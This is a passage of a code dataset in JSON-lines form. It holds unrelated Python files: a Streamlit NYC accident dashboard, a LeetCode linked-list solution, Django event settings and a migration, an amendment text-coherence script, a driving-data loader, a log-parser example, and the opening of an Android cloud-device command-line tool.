in 5 Boroughs\")\n min_date = min(location['Date'].dt.date)\n max_date = max(location['Date'].dt.date)\n #UI Control #1\n start_date = st.sidebar.date_input('Start date', datetime.date(2015,1,1), min_value = min_date, max_value = max_date)\n end_date = st.sidebar.date_input('End date', datetime.date(2017,1,1), min_value = min_date, max_value=max_date)\n if start_date > end_date:\n st.error('Error: End date must fall after start date.')\n #filters data based on start and end date chosen by user\n #Pandas Features #1 - Sorting\n filtered_data = location[(location['Date'].dt.date >= start_date) & (location['Date'].dt.date <= end_date)]\n #filtered_df gives a filtered version of the larger database, for the summary on the left column\n filtered_df = df[(df['DATE'].dt.date >= start_date) & (df['DATE'].dt.date <= end_date)]\n # Pandas Features #2, Groupby\n summary = filtered_df.groupby([\"BOROUGH\"])[[\"PERSONS INJURED\", \"PERSONS KILLED\"]].sum().sort_values(('PERSONS KILLED'), ascending=True)\n st.sidebar.text(f'Average number of injuries per accident \\n for the time period selected: {round(filtered_df[\"PERSONS INJURED\"].mean(),3)}')\n st.sidebar.text(f'Average number of deaths per accident \\n for the time period selected: {round(filtered_df[\"PERSONS KILLED\"].mean(),3)}')\n st.sidebar.text(f\"Number of People Injured or Killed \\n From {start_date} to {end_date}.\")\n st.sidebar.dataframe(summary)\n st.subheader(f'Map of all accidents from {start_date} to {end_date}')\n st.map(filtered_data)\n\n\nfactors = []\nboroughs = []\n#Interacting with Lists or List Comprehensions\nfor i in df[\"VEHICLE 1 FACTOR\"]:\n if i not in factors:\n factors.append(i)\nfor j in df[\"BOROUGH\"]:\n if j not in boroughs:\n boroughs.append(j)\n\n#At least one function with a default parameter called more than once in your\n#application (one time with the default value, and one time without) [called in pie chart & boxplot, see below)\ndef random_color(length, starting_letter = \"A\"):\n color = [\"#\" + starting_letter + ''.join([random.choice('0123456789ABCDEF') for j in range(5)])\n for i in range(length)]\n return(color)\n\n\n#At least one function with at least two parameters that returns a value\ndef accidents_breakdown(df, factors, boroughs):\n\n # UI Control #2\n which_factor = st.sidebar.selectbox(\"Factor\", factors)\n # UI Control #3\n which_borough = st.sidebar.radio(\"Borough\", boroughs)\n which_result = st.sidebar.selectbox(\"Injured or Killed\", [\"Injured\", \"Killed\"])\n st.title(f\"Accident Factor Breakdown by Injury in {which_borough}\")\n filtered = df[(df[\"VEHICLE 1 FACTOR\"] == which_factor) & (df[\"BOROUGH\"] == which_borough)]\n # #Pandas Features #3 - Pivot Table\n pivot_injured = pd.pivot_table(filtered, index=[\"VEHICLE 1 FACTOR\"],\n values=[\"PEDESTRIANS INJURED\", \"CYCLISTS INJURED\", \"MOTORISTS INJURED\"],\n aggfunc=np.sum)\n pivot_killed = pd.pivot_table(filtered, index=[\"VEHICLE 1 FACTOR\"],\n values=[\"PEDESTRIANS KILLED\", \"CYCLISTS KILLED\", \"MOTORISTS KILLED\"],\n aggfunc=np.sum)\n\n pivot_killed_df = pd.DataFrame(pivot_killed)\n pivot_injured_df = pd.DataFrame(pivot_injured)\n\n explode = []\n count = []\n if which_result == \"Injured\":\n dataframe = pivot_injured_df\n elif which_result == \"Killed\":\n dataframe = pivot_killed_df\n for i in range(0, 3):\n count.append(dataframe.iloc[0,i])\n for i in range(0, 3):\n if count[i] == max(count):\n explode.append(.1)\n else:\n explode.append(0)\n if sum(count) == 0:\n \"No Accidents with that Criteria \"\n else:\n fig, 
ax = plt.subplots()\n plt.rcParams['font.sans-serif'] = 'Arial'\n plt.rcParams['font.family'] = 'sans-serif'\n plt.rcParams['text.color'] = 'black'\n plt.rcParams['axes.labelcolor'] = 'slategrey'\n plt.rcParams['xtick.color'] = 'slategrey'\n plt.rcParams['ytick.color'] = 'slategrey'\n plt.rcParams['font.size'] = 12\n color_palette_list = random_color(3, \"B\")\n labels = [\"CYCLISTS INJURED\", \"MOTORISTS INJURED\", \"PEDESTRIANS INJURED\"]\n ax.pie(count, explode=explode, labels=None,\n colors=color_palette_list, autopct='%1.0f%%',\n shadow=False, startangle=0,\n pctdistance=1.2, labeldistance=1.5)\n ax.axis('equal')\n ax.set_title(f\"Breakdown of Accident Victims by Type ({which_result})\")\n ax.legend(frameon=False, bbox_to_anchor=(2, 0.8), labels=labels)\n st.set_option('deprecation.showPyplotGlobalUse', False)\n st.pyplot()\n\n if which_result == \"Injured\":\n st.dataframe(pivot_injured)\n label = \"PERSONS INJURED\"\n elif which_result == \"Killed\":\n st.dataframe(pivot_killed)\n label = \"PERSONS KILLED\"\n\n st.title(\"Breakdown by Vehicle Type\")\n vehicle_types = list(filtered[\"VEHICLE 1 TYPE\"])\n #Interacting with a Dictionary:\n color_dict = dict(zip(vehicle_types, random_color(len(vehicle_types))))\n\n #Use of function from the Python module you selected and researched\n #Used Seaborn boxplot feature\n boxplot = sns.boxplot(y=filtered[\"VEHICLE 1 TYPE\"], x=filtered[label], palette=color_dict)\n boxplot.axes.set_title(f\"Breakdown of {which_result} by Vehicle Type\", fontsize=16)\n boxplot.set_ylabel(\"Vehicle Type\")\n st.set_option('deprecation.showPyplotGlobalUse', False)\n st.pyplot()\n\ndef main():\n st.title(\"Welcome to the NYC Accidents Breakdown Interactive Webpage\")\n first_option = st.selectbox(\"Would you like to see a map or a breakdown of accidents in NYC?\", [\"Map\", \"Breakdown\"])\n if first_option == \"Map\":\n accidents_map(df)\n elif first_option == \"Breakdown\":\n accidents_breakdown(df, factors, boroughs)\n\nmain()\n\n\n\n##DOCUMENTED CODE:\n#Error ' Map Date Input Code:\n#https://newbedev.com/streamlit-date-input-format-code-example\n#Streamlit Form :https://blog.streamlit.io/introducing-submit-button-and-forms/\n#Plotting help: https://towardsdatascience.com/python-plotting-basics-simple-charts-with-matplotlib-seaborn-and-plotly-e36346952a3a\n#Generate random color : https://stackoverflow.com/questions/28999287/generate-random-colors-rgb\n","sub_path":"finalproject.py","file_name":"finalproject.py","file_ext":"py","file_size_in_byte":8309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
{"seq_id":"98589604","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author: bigfoolliu\n\n\n\"\"\"\nYou are given an array of linked lists, each of which is sorted in ascending order.\n\nMerge all the lists into one sorted linked list and return it.\n\n \n\nExample 1:\n\nInput: lists = [[1,4,5],[1,3,4],[2,6]]\nOutput: [1,1,2,3,4,4,5,6]\nExplanation: The linked lists are:\n[\n 1->4->5,\n 1->3->4,\n 2->6\n]\nMerging them into one sorted list gives:\n1->1->2->3->4->4->5->6\nExample 2:\n\nInput: lists = []\nOutput: []\nExample 3:\n\nInput: lists = [[]]\nOutput: []\n \n\nConstraints:\n\nk == lists.length\n0 <= k <= 10^4\n0 <= lists[i].length <= 500\n-10^4 <= lists[i][j] <= 10^4\nlists[i] is sorted in ascending order\nThe sum of lists[i].length does not exceed 10^4\n\n\nSource: LeetCode (LeetCode-CN)\nLink: https://leetcode-cn.com/problems/merge-k-sorted-lists\nAll rights reserved by LeetCode; commercial reuse requires official authorization, and non-commercial reuse must credit the source.\n\"\"\"\n\nimport doctest\nfrom typing import List\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n \"\"\"\n \"\"\"\n\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n \"\"\"\n Straightforward approach: pull every value out of the lists, sort them, then build a new linked list.\n \"\"\"\n nodes = []\n # collect the values of all nodes\n for list_node in lists:\n cur = list_node\n while cur:\n nodes.append(cur.val)\n cur = cur.next\n\n nodes.sort()\n\n dummy = ListNode(-1)\n cur = dummy\n for node in nodes:\n cur.next = ListNode(node)\n cur = cur.next\n \n return dummy.next\n\n\nif __name__ == '__main__':\n doctest.testmod()\n","sub_path":"algorithms/leetcode/hard/0023_合并K个升序链表.py","file_name":"0023_合并K个升序链表.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
{"seq_id":"123432553","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport locale\nfrom django.conf import settings as site_settings\nlocale.setlocale(locale.LC_ALL, '')\n\n\nDEFAULT_SETTINGS = {\n 'CATEGORY_TYPES': [\n 'award',\n 'carnival',\n 'cocktail',\n 'commemoration',\n 'competition',\n 'conference',\n 'congress',\n 'concert',\n 'course',\n 'dinner',\n 'entertainment',\n 'exhibition',\n 'family',\n 'friends',\n 'festival',\n 'lecture',\n 'market',\n 'meeting',\n 'networking',\n 'outdoor',\n 'parade',\n 'party',\n 'past locations',\n 'peregrination',\n 'seminar',\n 'spectacle',\n 'talk',\n 'trade show',\n 'general',\n 'visit',\n ],\n 'ENTITY_TYPES': (\n 'Attendee',\n 'Author',\n 'Band',\n 'Contributor',\n 'Host',\n 'Moderator',\n 'Organizer',\n 'Panelist',\n 'Performer',\n 'Singer',\n 'Social',\n 'Speaker',\n 'Speakers',\n 'Special Guest',\n 'Sponsor',\n ),\n 'DEFAULT_COUNTRY': 'US',\n 'STATE_CHOICES': (\n ('AL', 'Alabama'),\n ('AK', 'Alaska'),\n ('AZ', 'Arizona'),\n ('AR', 'Arkansas'),\n ('CA', 'California'),\n ('CO', 'Colorado'),\n ('CT', 'Connecticut'),\n ('DE', 'Delaware'),\n ('DC', 'District of Columbia'),\n ('FL', 'Florida'),\n ('GA', 'Georgia'),\n ('HI', 'Hawaii'),\n ('ID', 'Idaho'),\n ('IL', 'Illinois'),\n ('IN', 'Indiana'),\n ('IA', 'Iowa'),\n ('KS', 'Kansas'),\n ('KY', 'Kentucky'),\n ('LA', 'Louisiana'),\n ('ME', 'Maine'),\n ('MD', 'Maryland'),\n ('MA', 'Massachusetts'),\n ('MI', 'Michigan'),\n ('MN', 'Minnesota'),\n ('MS', 'Mississippi'),\n ('MO', 'Missouri'),\n ('MT', 'Montana'),\n ('NE', 'Nebraska'),\n ('NV', 'Nevada'),\n ('NH', 'New Hampshire'),\n ('NJ', 'New Jersey'),\n ('NM', 'New Mexico'),\n ('NY', 'New York'),\n ('NC', 'North Carolina'),\n ('ND', 'North Dakota'),\n ('OH', 'Ohio'),\n ('OK', 'Oklahoma'),\n ('OR', 'Oregon'),\n ('PA', 'Pennsylvania'),\n ('RI', 'Rhode Island'),\n ('SC', 'South Carolina'),\n ('SD', 'South Dakota'),\n ('TN', 'Tennessee'),\n ('TX', 'Texas'),\n ('UT', 'Utah'),\n ('VT', 'Vermont'),\n ('VA', 'Virginia'),\n ('WA', 'Washington'),\n ('WV', 'West Virginia'),\n ('WI', 'Wisconsin'),\n ('WY', 'Wyoming'),\n ),\n 'DAY_CHOICES': (\n ('', '---'),\n (locale.nl_langinfo(locale.DAY_1).lower(), locale.nl_langinfo(locale.DAY_1)),\n (locale.nl_langinfo(locale.DAY_2).lower(), locale.nl_langinfo(locale.DAY_2)),\n (locale.nl_langinfo(locale.DAY_3).lower(), locale.nl_langinfo(locale.DAY_3)),\n (locale.nl_langinfo(locale.DAY_4).lower(), locale.nl_langinfo(locale.DAY_4)),\n (locale.nl_langinfo(locale.DAY_5).lower(), locale.nl_langinfo(locale.DAY_5)),\n (locale.nl_langinfo(locale.DAY_6).lower(), locale.nl_langinfo(locale.DAY_6)),\n (locale.nl_langinfo(locale.DAY_7).lower(), locale.nl_langinfo(locale.DAY_7)),\n ),\n 'CURRENCY_CHOICES': (\n ('USD', 'US Dollar'),\n ),\n 'DEFAULT_CURRENCY': 'USD',\n 'ACCESS_CHOICES': (\n ('PUBLIC', 'Public'),\n ('PRIVATE', 'Private'),\n ),\n 'DEFAULT_ACCESS': 'PUBLIC',\n 'STORAGE': None,\n 
'RELATION_MODELS': [],\n 'RELATION_TYPES': (\n \"Key Image\",\n \"Key Video\",\n \"Alternative Event\",\n \"Related Event\",\n \"Enclosure Event\",\n \"Current/Traveling Exhibition\",\n ),\n 'PLACE_AMENITY_TYPES': (\n 'Accessibility',\n 'Contact Us',\n 'Directions & Parking',\n 'During Your Visit',\n 'Gift Certificate',\n 'Group Sales',\n 'Hours & Ticket Pricing',\n 'Museum Store',\n 'Parking',\n 'Pricing',\n 'Schools & Youth Groups',\n 'Ticketing',\n 'Visiting Info',\n ),\n 'EVENT_AMENITY_TYPES': [\n 'Check-in',\n 'Event Schedule',\n 'Inclement Weather',\n 'Learn More',\n 'Registration',\n ],\n 'ARCHIVE_EVENT_IN_DAYS': 7,\n 'EVENT_TYPES': [\n ('event', 'Event'),\n ('current exhibition', 'Exhibition'),\n ('traveling exhibition', 'Traveling Exhibition'),\n ],\n 'IMAGE_MODEL_IMAGE_FIELD': 'image',\n 'IMAGE_MODEL_WIDTH_FIELD': 'width',\n 'IMAGE_MODEL_HEIGHT_FIELD': 'height',\n\n # IMAGE_MODEL_RESIZER: A callable or string representing method to import\n # method must accept (image_object, required_width, required_height)\n # and return image_url\n 'IMAGE_MODEL_RESIZER': None,\n}\n\nUSER_SETTINGS = DEFAULT_SETTINGS.copy()\nUSER_SETTINGS.update(getattr(site_settings, 'HAPPENINGS_SETTINGS', {}))\n\n# The EVENT_AMENITY_TYPES should be a super-set of PLACE_AMENITY_TYPES.\nUSER_SETTINGS['EVENT_AMENITY_TYPES'] = sorted(list(set(USER_SETTINGS['EVENT_AMENITY_TYPES']) | set(USER_SETTINGS['PLACE_AMENITY_TYPES'])))\n\nglobals().update(USER_SETTINGS)\n","sub_path":"happenings/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"122507049","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport os\nimport sys\nfrom unidecode import unidecode\nimport pandas as pd\nimport nltk\nfrom gensim.models import KeyedVectors\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport ClassificadorDeEmendas as clfe\nimport plObjFunc as pl\n\n\ndef proc_agreg_out(agr_out):\n bet_quote = re.compile(r\"\\'(.*?)\\'\", flags=re.IGNORECASE)\n existe_agreg = False\n if re.search('__INICIO_AGREGADOR__', emd):\n nxt = emd.split(\"__INICIO_AGREGADOR__\\n\")[1]\n if re.search(r'.+\\n(?=__FIM_AGREGADOR__)', nxt):\n ent = nxt.split('__FIM_AGREGADOR__')[0]\n existe_agreg = True\n\n lista_indices = []\n if existe_agreg:\n for item in ent.splitlines():\n item = re.findall(bet_quote, item)\n pl_index = []\n\n # Le todos os casos, cria uma lista com os indices para o obj pl\n for nr, index in enumerate(item):\n try:\n if nr == 0 or nr == 1:\n pl_index.append(int(index.split('_')[1]))\n if nr == 2:\n pl_index.append(pl.roman_to_int(index.split('_')[1]))\n if nr == 3:\n pl_index.append(pl.ali_to_num(index.split('_')[1]))\n except:\n pl_index.append(None)\n\n # Tratamento de casos especiais\n # Desconsidera caso não exista artigo\n if not pl_index[0]:\n continue\n # Caso receba somente artigo e não parágrafo, use o\n # parágrafo 0\n if pl_index[0] and not pl_index[1] and pl_index[2]:\n pl_index[1] = 0\n # Caso receba somente artigo e alinea\n if (pl_index[0] and not pl_index[1] and not pl_index[3] and\n pl_index[3]):\n pl_index[1] = 0\n pl_index[2] = 1\n\n # Retira valores None e inserir indices para correta localização\n pl_index = [i for i in pl_index if i is not None]\n if len(pl_index) == 4:\n pl_index.insert(2, 1)\n pl_index.insert(-1, 1)\n if len(pl_index) == 3:\n pl_index.insert(-1, 1)\n\n lista_indices.append(pl_index)\n return lista_indices\n\n# 
=============================================================================\nmpv = pl.PlObjCreate('./teste/mpv870/MPV870_txt_site.txt')\nemd_dir_path = '../parser_itens/emd_pars_agreg'\nmodelPath = '../coherence/languagemodel/vectors_new.bin'\n# =============================================================================\n\n\n# Path to the .txt file with the bill's full text\n#mpv = pl.PlObjCreate(sys.argv[1])\n# Path to the folder containing the amendments processed by the aggregator\n#emd_dir_path = sys.argv[2]\n# Path to the trained Skipgram .bin model\n#modelPath = sys.argv[3]\n\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\nstp_wrd = stopwords.words('portuguese') # nltk.download() returns a bool, not the word list; language assumed Portuguese for this corpus\ntokenizer = CountVectorizer(stop_words=stp_wrd).build_tokenizer()\nmodel = KeyedVectors.load_word2vec_format(modelPath, binary=True)\n\nfiles = []\nfor dirpath, dirnames, filenames in os.walk(emd_dir_path):\n for filename in filenames:\n files.append(os.path.normpath(os.path.join(dirpath, filename)))\n\ntipos_de_emenda = clfe.preve_emenda(emd_dir_path)\n\nto_df_row = []\nfor file, tipo_emenda in zip(files, tipos_de_emenda):\n # Check the amendment type\n if tipo_emenda == 'O':\n continue\n\n with open(file, mode='r', encoding='utf8') as emenda:\n lista_de_itens_alterados = []\n\n emd = emenda.read()\n texto_emd = tokenizer(unidecode(emd.split(\"!@#$%\")[0].lower()))\n\n # Process the amendments output by the aggregator\n\n lista_de_itens_alterados = proc_agreg_out(emd)\n\n for alteracao in lista_de_itens_alterados:\n if tipo_emenda == 'MOD':\n # Look up the position in the plObj\n try:\n texto_pl = pl.nested_lookup(mpv[1], alteracao)\n\n # Build a single string with every text found at\n # that position\n texto_pl = ' '.join(list(pl.flatten(texto_pl))).lower()\n texto_pl = tokenizer(unidecode(texto_pl))\n\n alteracao = [str(i) for i in alteracao]\n dist = model.wmdistance(texto_pl, texto_emd)\n to_df_row.append([file, ' '.join(alteracao), dist])\n\n except IndexError:\n alteracao = [str(i) for i in alteracao]\n print(\"Element not found {}, {}\".format(file,\n alteracao))\n\ndf = pd.DataFrame(to_df_row, columns=['file', 'item', 'dist'])\ndf.to_csv('df_csv.csv')\n","sub_path":"PLSintetica/emd_item_coherence.py","file_name":"emd_item_coherence.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
{"seq_id":"434897511","text":"\"\"\"\nPython module to load the data for training\n\"\"\"\nimport cv2\nimport csv\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.image as mpimg\nfrom sklearn.utils import shuffle\nfrom tqdm import tqdm\n\n# Function to load dataset\ndef load_dataset(csv_path, relative_path):\n \"\"\"\n Inputs\n ---\n csv_path: path to training data csv\n relative_path: relative path to training data\n\n Outputs\n ---\n X: Training data numpy array\n y: Training labels numpy array\n \"\"\"\n # Read CSV lines\n lines = []\n with open(csv_path) as csvfile:\n reader = csv.reader(csvfile)\n print(\"Loading CSV File ...\")\n for line in tqdm(reader):\n lines.append(line)\n \n images = []; measurements = []\n print(\"Loading Data ...\")\n\n # Read from CSV lines\n for line in tqdm(lines):\n # Center Image\n image, measurement = _load_image(line, 0, relative_path)\n images.append(image)\n measurements.append(measurement)\n\n image_flipped = np.fliplr(image)\n images.append(image_flipped)\n\n measurement_flipped = -1 * measurement\n measurements.append(measurement_flipped)\n\n # Left Image\n image, measurement = _load_image(line, 1, relative_path)\n 
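# (Editor's note: index 1 selects the left camera image; _load_image, defined\n # below, applies a +/-0.2 steering-angle correction for the side cameras.)\n 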
images.append(image)\n measurements.append(measurement)\n\n image_flipped = np.fliplr(image)\n images.append(image_flipped)\n\n measurement_flipped = -1 * measurement\n measurements.append(measurement_flipped)\n\n # Right Image\n image, measurement = _load_image(line, 2, relative_path)\n images.append(image)\n measurements.append(measurement)\n\n image_flipped = np.fliplr(image)\n images.append(image_flipped)\n\n measurement_flipped = -1 * measurement\n measurements.append(measurement_flipped)\n\n X = np.array(images)\n y = np.array(measurements)\n\n return X, y\n\n# Function to generate a Generator\ndef load_generator(csv_path, relative_path, batch_size = 5):\n \"\"\"\n Inputs\n ---\n csv_path: csv file to read data from\n relative_path: relative path of the data\n batch_size: batch size of the generator (factor of 6)\n\n Outputs\n ---\n generator: generator function\n \"\"\"\n # Read CSV lines\n lines = []\n with open(csv_path) as csvfile:\n reader = csv.reader(csvfile)\n print(\"Loading CSV File ...\")\n for line in tqdm(reader):\n lines.append(line)\n \n train_data, validation_data = train_test_split(lines, test_size=0.2)\n\n # Define a generator function\n def generator(data, batch_size = batch_size):\n num_data = len(data)\n while True:\n shuffle(data)\n for offset in range(0, num_data, batch_size):\n batch_data = data[offset : offset + batch_size]\n\n images = []; measurements = []\n # Generate batches\n for batch in batch_data:\n # Center Image\n image, measurement = _load_image(batch, 0, relative_path)\n images.append(image)\n measurements.append(measurement)\n\n image_flipped = np.fliplr(image)\n images.append(image_flipped)\n\n measurement_flipped = -1 * measurement\n measurements.append(measurement_flipped)\n\n # Left Image\n image, measurement = _load_image(batch, 1, relative_path)\n images.append(image)\n measurements.append(measurement)\n\n image_flipped = np.fliplr(image)\n images.append(image_flipped)\n\n measurement_flipped = -1 * measurement\n measurements.append(measurement_flipped)\n\n # Right Image\n image, measurement = _load_image(batch, 2, relative_path)\n images.append(image)\n measurements.append(measurement)\n\n image_flipped = np.fliplr(image)\n images.append(image_flipped)\n\n measurement_flipped = -1 * measurement\n measurements.append(measurement_flipped)\n \n X = np.array(images)\n y = np.array(measurements)\n\n X, y = shuffle(X, y)\n yield (X, y)\n \n return generator(train_data), generator(validation_data), len(train_data), len(validation_data)\n\n# Private function to load image\ndef _load_image(line, index, relative_path):\n \"\"\"\n Inputs\n ---\n line: csv line to read data from\n index: decides left, right or center\n relative_path: relative path of the data\n\n Outputs\n ---\n image: output image\n measurement: output measurement\n \"\"\"\n source_path = line[index]\n filename = source_path.split('\\\\')[-1]\n current_path = relative_path + filename\n image = mpimg.imread(current_path)\n\n if index == 1:\n # Left Image\n correction = 0.2\n elif index == 2:\n # Right Image\n correction = -0.2\n else:\n # Center Image\n correction = 0\n\n measurement = float(line[3]) + correction\n\n return image, measurement","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"311471257","text":"#!/usr/bin/env python3\nimport sys\nfrom Kwogger.Kwogger import KwogParse\n\nfor log_name in ['example_task', 'example_beat']:\n\n log = 
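# The center/left/right blocks in load_dataset and in the generator above are
# three copies of the same flip augmentation. A hypothetical helper (not in the
# original module) that collapses them; the module's _load_image would be
# passed in as `load_image`.
import numpy as np

def augment_line(line, relative_path, load_image):
    """Return images/steering angles for one CSV line, plus flipped copies."""
    images, measurements = [], []
    for index in range(3):  # 0 = center, 1 = left, 2 = right camera
        image, measurement = load_image(line, index, relative_path)
        images.extend([image, np.fliplr(image)])
        measurements.extend([measurement, -1 * measurement])
    return images, measurements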
KwogParse(log_name=log_name)\n\n try:\n mode = sys.argv[1]\n except IndexError:\n mode = 'print'\n\n print(f'MODE: {mode}')\n\n if mode == 'elasticsearch':\n log.send_to_elasticsearch()\n\n elif mode == 'mongodb':\n log.send_to_mongodb()\n\n elif mode == 'print':\n for entry in log:\n print(entry)\n\n else:\n raise ValueError(f'Invalid mode {mode}')\n","sub_path":"example_parser.py","file_name":"example_parser.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"313585202","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('todolist', '0005_auto_20150929_0745'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='todolist',\n name='deadline',\n field=models.CharField(default=datetime.datetime(2015, 9, 29, 17, 47, 17, 439443, tzinfo=utc), max_length=10),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='todolist',\n name='email',\n field=models.EmailField(max_length=254, null=True, verbose_name=b'signup'),\n ),\n ]\n","sub_path":"todolist/migrations/0006_auto_20150929_1747.py","file_name":"0006_auto_20150929_1747.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"615988313","text":"#!/usr/bin/env python\n#\n# Copyright 2016 - The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nr\"\"\"Cloud Android Driver.\n\nThis CLI manages google compute engine project for android devices.\n\n- Prerequisites:\n See: go/acloud-manual\n\n- Configuration:\n The script takes a required configuration file, which should look like\n \n # If using service account\n service_account_name: \"your_account@developer.gserviceaccount.com\"\n service_account_private_key_path: \"/path/to/your-project.p12\"\n\n # If using OAuth2 authentication flow\n client_id: \n client_secret: \n\n # Optional\n ssh_private_key_path: \"~/.ssh/acloud_rsa\"\n ssh_public_key_path: \"~/.ssh/acloud_rsa.pub\"\n orientation: \"portrait\"\n resolution: \"800x1280x32x213\"\n network: \"default\"\n machine_type: \"n1-standard-1\"\n extra_data_disk_size_gb: 10 # 4G or 10G\n\n # Required\n project: \"your-project\"\n zone: \"us-central1-f\"\n storage_bucket_name: \"your_google_storage_bucket_name\"\n \n\n Save it at /path/to/acloud.config\n\n- Example calls:\n - Create two instances:\n $ acloud.par create\n --build_target gce_x86_phone-userdebug_fastbuild3c_linux \\\n --build_id 3744001 --num 2 --config_file /path/to/acloud.config \\\n --report_file /tmp/acloud_report.json --log_file /tmp/acloud.log\n\n - Delete two instances:\n $ acloud.par delete --instance_names\n ins-b638cdba-3744001-gce-x86-phone-userdebug-fastbuild3c-linux\n --config_file /path/to/acloud.config\n --report_file /tmp/acloud_report.json --log_file 
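# The migration above bakes a frozen datetime into the column default. A hedged
# alternative sketch using a callable default so each row gets the save-time
# value; the model and field names are illustrative, not the project's, and a
# configured Django app is assumed.
from django.db import models
from django.utils import timezone

class TodoItem(models.Model):
    deadline = models.DateTimeField(default=timezone.now)  # callable, not a frozen value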
/tmp/acloud.log\n\"\"\"\nimport argparse\nimport getpass\nimport logging\nimport os\nimport sys\n\nfrom acloud.internal import constants\nfrom acloud.public import acloud_common\nfrom acloud.public import config\nfrom acloud.public import device_driver\nfrom acloud.public import errors\n\nLOGGING_FMT = \"%(asctime)s |%(levelname)s| %(module)s:%(lineno)s| %(message)s\"\nLOGGER_NAME = \"acloud_main\"\n\n# Commands\nCMD_CREATE = \"create\"\nCMD_DELETE = \"delete\"\nCMD_CLEANUP = \"cleanup\"\nCMD_SSHKEY = \"project_sshkey\"\n\n\ndef _ParseArgs(args):\n \"\"\"Parse args.\n\n Args:\n args: Argument list passed from main.\n\n Returns:\n Parsed args.\n \"\"\"\n usage = \",\".join([CMD_CREATE, CMD_DELETE, CMD_CLEANUP, CMD_SSHKEY])\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n usage=\"%(prog)s {\" + usage + \"} ...\")\n subparsers = parser.add_subparsers()\n subparser_list = []\n\n # Command \"create\"\n create_parser = subparsers.add_parser(CMD_CREATE)\n create_parser.required = False\n create_parser.set_defaults(which=CMD_CREATE)\n create_parser.add_argument(\n \"--build_target\",\n type=str,\n dest=\"build_target\",\n help=\"Android build target, e.g. gce_x86-userdebug, \"\n \"or short names: phone, tablet, or tablet_mobile.\")\n create_parser.add_argument(\n \"--branch\",\n type=str,\n dest=\"branch\",\n help=\"Android branch, e.g. mnc-dev or git_mnc-dev\")\n # TODO(fdeng): Support HEAD (the latest build)\n create_parser.add_argument(\"--build_id\",\n type=str,\n dest=\"build_id\",\n help=\"Android build id, e.g. 2145099, P2804227\")\n create_parser.add_argument(\n \"--spec\",\n type=str,\n dest=\"spec\",\n required=False,\n help=\"The name of a pre-configured device spec that we are \"\n \"going to use. Choose from: %s\" % \", \".join(constants.SPEC_NAMES))\n create_parser.add_argument(\"--num\",\n type=int,\n dest=\"num\",\n required=False,\n default=1,\n help=\"Number of instances to create.\")\n create_parser.add_argument(\n \"--gce_image\",\n type=str,\n dest=\"gce_image\",\n required=False,\n help=\"Name of an existing compute engine image to reuse.\")\n create_parser.add_argument(\"--local_disk_image\",\n type=str,\n dest=\"local_disk_image\",\n required=False,\n help=\"Path to a local disk image to use, \"\n \"e.g /tmp/avd-system.tar.gz\")\n create_parser.add_argument(\n \"--no_cleanup\",\n dest=\"no_cleanup\",\n default=False,\n action=\"store_true\",\n help=\"Do not clean up temporary disk image and compute engine image. \"\n \"For debugging purposes.\")\n create_parser.add_argument(\n \"--serial_log_file\",\n type=str,\n dest=\"serial_log_file\",\n required=False,\n help=\"Path to a *tar.gz file where serial logs will be saved \"\n \"when a device fails on boot.\")\n create_parser.add_argument(\n \"--logcat_file\",\n type=str,\n dest=\"logcat_file\",\n required=False,\n help=\"Path to a *tar.gz file where logcat logs will be saved \"\n \"when a device fails on boot.\")\n\n subparser_list.append(create_parser)\n\n # Command \"Delete\"\n delete_parser = subparsers.add_parser(CMD_DELETE)\n delete_parser.required = False\n delete_parser.set_defaults(which=CMD_DELETE)\n delete_parser.add_argument(\n \"--instance_names\",\n dest=\"instance_names\",\n nargs=\"+\",\n required=True,\n help=\"The names of the instances that need to delete, \"\n \"separated by spaces, e.g. 
